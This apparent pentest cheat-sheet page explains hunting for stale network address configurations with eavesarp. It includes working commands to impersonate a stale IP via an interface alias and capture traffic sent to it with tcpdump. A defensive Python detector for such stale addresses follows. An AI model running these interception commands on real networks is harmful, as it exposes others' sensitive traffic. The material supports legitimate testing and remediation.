# SNACs Abuse

* <https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/>
* <https://github.com/arch4ngel/eavesarp>
* <https://github.com/s0i37/net/blob/main/arp_snac.py>

Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations):

```
$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]
```

If a SNAC is found (it can be detected, for example, when a host has moved from one IP to another and its DNS A record no longer matches its DNS PTR record) and some application in the network is still trying to send sensitive data to the *stale* IP address (because it may simply be hard-coded in the app), an adversary can set an alias on their interface, pretending to be the host with the *stale* IP, and collect all the traffic intended for it:

```
# Check again with tcpdump
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"

# Abuse it!
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
# Or
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
$ sudo ip addr add <STALE_IP>/24 dev eth0

# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0
```
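The two signals described above (ARP requests for an address that never speaks, plus an A/PTR mismatch) can also be checked from the defender's side to find clients that still point at a stale IP so their configuration can be corrected. This is an added example, not code from eavesarp or the linked posts; the function `find_snacs`, the `min_requests` threshold, and all sample addresses and names are constructed assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample input (not from the page): ARP requests seen on a segment,
# as (sender_ip, target_ip), plus reverse (PTR) and forward (A) DNS lookups.
ARP_REQUESTS = [
    ("10.0.0.5", "10.0.0.20"), ("10.0.0.5", "10.0.0.20"), ("10.0.0.5", "10.0.0.20"),
    ("10.0.0.7", "10.0.0.1"), ("10.0.0.1", "10.0.0.7"),
    ("10.0.0.9", "10.0.0.30"),
]
PTR_RECORDS = {"10.0.0.20": "db01.corp.example"}
A_RECORDS = {"db01.corp.example": "10.0.0.45"}


def find_snacs(arp_requests, ptr_records, a_records, min_requests=2):
    """Return SNAC candidates: IPs that are repeatedly requested but never speak."""
    # Heuristic: a live host eventually sends ARP requests of its own, so any IP
    # seen as a sender is treated as active on the segment.
    active = {sender for sender, _ in arp_requests}
    by_target = defaultdict(Counter)
    for sender, target in arp_requests:
        by_target[target][sender] += 1

    findings = []
    for target, senders in sorted(by_target.items()):
        total = sum(senders.values())
        if target in active or total < min_requests:
            continue
        # A/PTR check: the name the stale IP reverses to now resolves elsewhere.
        name = ptr_records.get(target)
        current = a_records.get(name) if name else None
        findings.append({
            "stale_ip": target,
            "clients": sorted(senders),   # hosts whose configuration needs fixing
            "requests": total,
            "ptr_name": name,
            "current_ip": current,
            "dns_mismatch": current is not None and current != target,
        })
    return findings


if __name__ == "__main__":
    for finding in find_snacs(ARP_REQUESTS, PTR_RECORDS, A_RECORDS):
        print(finding)
```

Each finding names the clients still addressing the stale IP; fixing their configuration and removing the leftover PTR record closes the gap.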


